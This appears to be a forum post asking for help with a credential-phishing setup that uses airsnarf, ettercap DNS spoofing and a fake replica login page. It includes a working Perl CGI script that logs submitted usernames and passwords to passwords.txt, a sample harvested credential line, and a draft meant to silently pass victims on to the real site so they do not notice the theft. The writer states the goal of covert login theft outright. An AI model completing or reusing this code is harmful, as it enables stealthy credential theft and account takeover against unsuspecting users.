Okay, so I've set up airsnarf in the lab. I'm using ettercap to spoof the DNS, and I have modified a fake replica page where the login action invokes the CGI script below. The login is saved and all works fine. My question is: instead of serving up the said CGI page with the example message "sorry our server is down for maintenance", how would we go about using the information from stdin to refer and log the victim into their account whilst still recording the data to passwords.txt? So instead of stealing the victim's login and printing a suspicious "sorry our servers are down" message, the victim's login should be stolen, but the victim should also be signed into his account, none the wiser of what just happened.

So, a quick overview: the user presses login on the fake replica page, the CGI/HTML script is executed, his info is stored to passwords.txt, but he is also then logged in without seeing any of this happen.


CURRENT CGI SCRIPT

#!perl
# chmod +x this file and stick it in your cgi-bin directory

# CHANGE THESE VARIABLES $page_title $page_message $page_image
$page_title = "BUSY SERVERS";
$page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
$page_image = "SERVER.jpg";

print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
print "<html><head><title>$page_title</title></head><body>";
print "<center>";
print "<img src=\"/$page_image\"><br><br>";
print "$page_message<br><br>\n";
print "</body></html>";


Here is an example of what passwords.txt looks like:


url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0
This is what the script needs to look like, something along these lines (excuse this pathetic attempt):

#!perl
# chmod +x this file and stick it in your cgi-bin directory


print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
<html>
<body>

<form method="post" action="not for forum">


<input type="hidden" name="page" value="$page">

username: <input type="text" name="login_email" value="$key" size=10><br>
password: <input type="password" name="login_password" value="$FORM" size=10><p>


<input type="submit" value="Log In">

</form>

</body>
</html>
Thanks in advance.